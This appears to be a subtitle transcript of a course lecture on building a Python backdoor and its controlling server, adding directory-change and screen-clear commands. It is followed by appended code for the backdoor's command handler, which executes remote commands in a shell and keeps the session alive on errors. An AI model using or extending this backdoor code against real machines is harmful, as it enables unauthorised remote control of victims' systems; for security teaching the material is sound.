1
00:00:00,690 --> 00:00:01,650
-: Welcome back.

2
00:00:01,650 --> 00:00:04,470
Let us see how we can implement the changing

3
00:00:04,470 --> 00:00:08,220
of the directory inside of our server and backdoor.

4
00:00:08,220 --> 00:00:11,610
So, in the previous video we tested our program

5
00:00:11,610 --> 00:00:12,720
for the first time

6
00:00:12,720 --> 00:00:16,110
and we were able to execute all of the commands.

7
00:00:16,110 --> 00:00:18,750
But, once we tried to change the directory

8
00:00:18,750 --> 00:00:22,170
on the target system, we weren't able to do that.

9
00:00:22,170 --> 00:00:24,450
We were stuck in the same directory.

10
00:00:24,450 --> 00:00:26,646
So let's see how we can bypass this and

11
00:00:26,646 --> 00:00:29,130
how we can be able to change the directories

12
00:00:29,130 --> 00:00:31,050
inside of our backdoor code.

13
00:00:31,050 --> 00:00:32,759
The first thing that we must do is,

14
00:00:32,759 --> 00:00:35,253
we must nano our backdoor,

15
00:00:36,600 --> 00:00:41,220
and down in the shell function, here we must add an option

16
00:00:41,220 --> 00:00:44,100
if the command starts with cd.

17
00:00:44,100 --> 00:00:47,938
First, Python has a library that is called the os library.

18
00:00:47,938 --> 00:00:50,640
And with the help of the os library,

19
00:00:50,640 --> 00:00:55,170
we can change the directory with just one single command.

20
00:00:55,170 --> 00:00:57,720
So the first thing that we must do is we must import

21
00:00:57,720 --> 00:00:59,850
that library, go up here

22
00:00:59,850 --> 00:01:01,953
and import os.
23
00:01:02,850 --> 00:01:05,970
Once you do that, down here in the shell function

24
00:01:05,970 --> 00:01:07,540
here we must add the command

25
00:01:08,700 --> 00:01:10,140
or the statement

26
00:01:10,140 --> 00:01:11,998
which will say elif

27
00:01:11,998 --> 00:01:13,090
command

28
00:01:14,850 --> 00:01:18,180
and then equals equals to cd

29
00:01:18,180 --> 00:01:19,650
empty space,

30
00:01:19,650 --> 00:01:22,650
then we will change the directory.

31
00:01:22,650 --> 00:01:25,290
But you might notice that there is something wrong

32
00:01:25,290 --> 00:01:27,840
with this statement right here.

33
00:01:27,840 --> 00:01:30,570
For example, we are comparing the command

34
00:01:30,570 --> 00:01:32,820
with cd and empty space,

35
00:01:32,820 --> 00:01:35,430
but most likely the command will be something like cd

36
00:01:35,430 --> 00:01:36,543
and then desktop.

37
00:01:37,500 --> 00:01:40,380
So if it compares this

38
00:01:40,380 --> 00:01:43,950
with this, these two will not be the same

39
00:01:43,950 --> 00:01:46,200
even though they start the same.

40
00:01:46,200 --> 00:01:50,150
So what we must do, instead of comparing the entire command,

41
00:01:50,150 --> 00:01:54,690
we must compare just the first three characters.

42
00:01:54,690 --> 00:01:57,360
And we can do that by specifying square brackets,

43
00:01:57,360 --> 00:02:01,110
and then two dots up to the third character.

44
00:02:01,110 --> 00:02:03,150
In other words, all of this just means

45
00:02:03,150 --> 00:02:05,490
that we are comparing the first three characters

46
00:02:05,490 --> 00:02:08,880
of the command with cd and empty space.

47
00:02:08,880 --> 00:02:11,039
And empty space is the reason why we're comparing

48
00:02:11,039 --> 00:02:12,753
three characters and not two.

49
00:02:14,100 --> 00:02:16,320
I have to re-compare this, and they do match.
50
00:02:16,320 --> 00:02:19,260
Then, we can use the os library and the function

51
00:02:19,260 --> 00:02:23,310
which is called chdir, which stands for change directory,

52
00:02:23,310 --> 00:02:25,601
on the command, and then,

53
00:02:25,601 --> 00:02:28,890
right here we need to do quite the opposite thing

54
00:02:28,890 --> 00:02:31,800
that we did, which is from the third character

55
00:02:31,800 --> 00:02:33,870
and then till the end.

56
00:02:33,870 --> 00:02:36,960
Since this function will be something like this,

57
00:02:36,960 --> 00:02:38,761
if we ran the command cd desktop,

58
00:02:38,761 --> 00:02:43,560
then this function will do something like this: os chdir

59
00:02:43,560 --> 00:02:45,930
and then desktop.

60
00:02:45,930 --> 00:02:49,200
So what we essentially did is we compared this

61
00:02:49,200 --> 00:02:52,800
and then if they did match, we then used this part

62
00:02:52,800 --> 00:02:54,840
of the command to change the directory.

63
00:02:54,840 --> 00:02:56,700
And this is pretty much it.

64
00:02:56,700 --> 00:02:59,190
We don't need to add anything else.

65
00:02:59,190 --> 00:03:01,320
This will change the directory for us.

66
00:03:01,320 --> 00:03:04,350
However, this is not everything that we must do.

67
00:03:04,350 --> 00:03:05,910
What else we must do is we must go

68
00:03:05,910 --> 00:03:08,370
to the server code and add the same command

69
00:03:08,370 --> 00:03:11,040
inside our target communication function.

70
00:03:11,040 --> 00:03:15,030
So right here we can add another elif statement:

71
00:03:15,030 --> 00:03:17,931
elif command equals equals to

72
00:03:17,931 --> 00:03:19,290
cd

73
00:03:19,290 --> 00:03:20,190
empty space.

74
00:03:20,190 --> 00:03:23,158
And here, remember that we also must add

75
00:03:23,158 --> 00:03:25,803
from the beginning up to the third character.

76
00:03:27,090 --> 00:03:30,600
Just in this case we are not going to do anything.
77
00:03:30,600 --> 00:03:34,183
We're going to just pass, because in the server

78
00:03:34,183 --> 00:03:36,990
we don't want to do anything, we just want to go back

79
00:03:36,990 --> 00:03:39,660
to the beginning where we can send the next command.

80
00:03:39,660 --> 00:03:42,180
And in the backdoor code we simply just

81
00:03:42,180 --> 00:03:44,790
change the directory of our program.

82
00:03:44,790 --> 00:03:46,800
Now, there is one more command that I want to add

83
00:03:46,800 --> 00:03:50,370
in this video, and that is the clear command.

84
00:03:50,370 --> 00:03:52,890
This is not really that useful, but once you have a bunch

85
00:03:52,890 --> 00:03:54,810
of commands and outputs on your desktop

86
00:03:54,810 --> 00:03:57,960
you can use something similar to this

87
00:03:57,960 --> 00:03:59,250
that we use right here.

88
00:03:59,250 --> 00:04:01,750
So if, for example, I type sudo ifconfig

89
00:04:03,338 --> 00:04:06,780
and it outputs me the ifconfig command,

90
00:04:06,780 --> 00:04:09,030
I can just type clear to clear the screen.

91
00:04:09,030 --> 00:04:12,390
So let us do something similar inside of our code.

92
00:04:12,390 --> 00:04:15,450
First we are going to go with this server,

93
00:04:15,450 --> 00:04:18,055
and if we send the command clear,

94
00:04:18,055 --> 00:04:20,220
this command will get sent to the target.

95
00:04:20,220 --> 00:04:22,019
However, we want to execute it

96
00:04:22,019 --> 00:04:24,090
right here inside of our server,

97
00:04:24,090 --> 00:04:26,700
since there is no point in executing the clear command

98
00:04:26,700 --> 00:04:30,180
inside of our backdoor code on the target system.

99
00:04:30,180 --> 00:04:32,310
So what we are going to do right here is we are

100
00:04:32,310 --> 00:04:34,530
going to add another elif statement:

101
00:04:34,530 --> 00:04:37,803
elif command equals equals to clear.
102
00:04:38,640 --> 00:04:41,932
We're going to use once again the os library

103
00:04:41,932 --> 00:04:45,270
and we are going to call the system command,

104
00:04:45,270 --> 00:04:47,520
which will execute the clear command.

105
00:04:47,520 --> 00:04:50,370
This system function allows us to specify any

106
00:04:50,370 --> 00:04:51,480
command in the brackets,

107
00:04:51,480 --> 00:04:55,020
which will then get executed inside of our terminal.

108
00:04:55,020 --> 00:04:57,630
Of course, since this is inside of the server code,

109
00:04:57,630 --> 00:05:00,963
we must import the os library here as well.

110
00:05:02,490 --> 00:05:04,530
And since the command will get sent

111
00:05:04,530 --> 00:05:07,865
to the backdoor as well, we want to cover that step also

112
00:05:07,865 --> 00:05:09,540
inside of our shell function.

113
00:05:09,540 --> 00:05:11,160
So let us go right here

114
00:05:11,160 --> 00:05:16,160
and add an elif statement: command equals equals to clear.

115
00:05:16,369 --> 00:05:20,853
Just in this case, we will pass and not do anything.

116
00:05:21,930 --> 00:05:23,970
Okay, simple as that.

117
00:05:23,970 --> 00:05:26,280
And these are just two commands that I wanted to cover

118
00:05:26,280 --> 00:05:29,010
in this video, of which only this cd command

119
00:05:29,010 --> 00:05:31,080
is really important for us right now.

120
00:05:31,080 --> 00:05:33,450
But in the next video, what we are going to do

121
00:05:33,450 --> 00:05:35,490
is we are going to see how we can download

122
00:05:35,490 --> 00:05:38,610
and upload files to the target system.

123
00:05:38,610 --> 00:05:41,697
Then at the end we are going to test our final version

124
00:05:41,697 --> 00:05:43,860
of the program and see whether all of these commands that we

125
00:05:43,860 --> 00:05:48,270
implemented work, or if there is something that we must change.
126
00:05:48,270 --> 00:05:50,790
So from now on we've got execution of the command,

127
00:05:50,790 --> 00:05:52,200
changing of the directory.

128
00:05:52,200 --> 00:05:55,590
We can clear the screen if we've got too many things happening,

129
00:05:55,590 --> 00:05:58,140
and we can quit outside of the shell.

130
00:05:58,140 --> 00:06:01,473
Great, let us continue coding in the next lecture.
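The backdoor-side command handling described in this lecture, written out as an added example (not the course's own server or backdoor code; the function names backdoor_handle, is_cd and demo are assumptions). It shows why running cd through a subshell leaves the backdoor "stuck in the same directory", the command[:3] == "cd " prefix check and os.chdir(command[3:]) from the lecture, and one caveat the lecture does not cover: os.chdir raises on a missing or unreadable directory, and an unhandled exception would terminate the backdoor, so the handler catches it and sends an error string back instead. Unlike the lecture, which sends nothing back for cd, this version replies with the new working directory so the operator can see where the shell is.

```python
import os
import shlex
import subprocess
import tempfile


def is_cd(command):
    """Same prefix test as the lecture: compare the first three characters
    with 'cd ' (the trailing space is why it is three and not two)."""
    return command[:3] == "cd "


def backdoor_handle(command):
    """Handle one command on the target side and return the reply text.

    'clear' is executed locally on the server, so the target only passes.
    'cd <dir>' must be handled with os.chdir in this process: a cd run in a
    child shell changes only the child's working directory.
    Everything else runs in a shell, as in the course.
    """
    if command == "clear":
        return ""
    if is_cd(command):
        target = command[3:].strip()          # text after 'cd ', as in the lecture
        if not target:
            return os.getcwd() + "\n"         # bare 'cd ': just report where we are
        try:
            os.chdir(target)
        except (FileNotFoundError, NotADirectoryError, PermissionError) as exc:
            # Without this, the exception would crash the backdoor and drop the session.
            return "cd: %s\n" % exc
        return os.getcwd() + "\n"
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def demo():
    """Constructed offline scenario in a temporary directory; returns a dict of
    observations so they can be checked rather than only printed."""
    start = os.getcwd()
    tmp = tempfile.mkdtemp()
    try:
        # 1. The naive approach: 'cd' executed in a subshell does nothing for us.
        subprocess.run("cd " + shlex.quote(tmp), shell=True)
        naive_changed = os.getcwd() != start

        # 2. The lecture's approach: os.chdir on the text after 'cd '.
        backdoor_handle("cd " + tmp)
        handled_changed = os.path.samefile(os.getcwd(), tmp)

        # 3. Caveat: a bad directory must yield an error reply, not an exception.
        error_reply = backdoor_handle("cd " + os.path.join(tmp, "does-not-exist"))
        still_in_tmp = os.path.samefile(os.getcwd(), tmp)

        return {
            "naive_changed": naive_changed,     # False
            "handled_changed": handled_changed, # True
            "error_reply": error_reply,         # starts with 'cd:'
            "still_in_tmp": still_in_tmp,       # True
        }
    finally:
        os.chdir(start)
        os.rmdir(tmp)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Note that the prefix test is deliberately strict: a command such as cdrom or cd-info does not match "cd " and falls through to normal execution, which is the behaviour the lecture's three-character comparison gives.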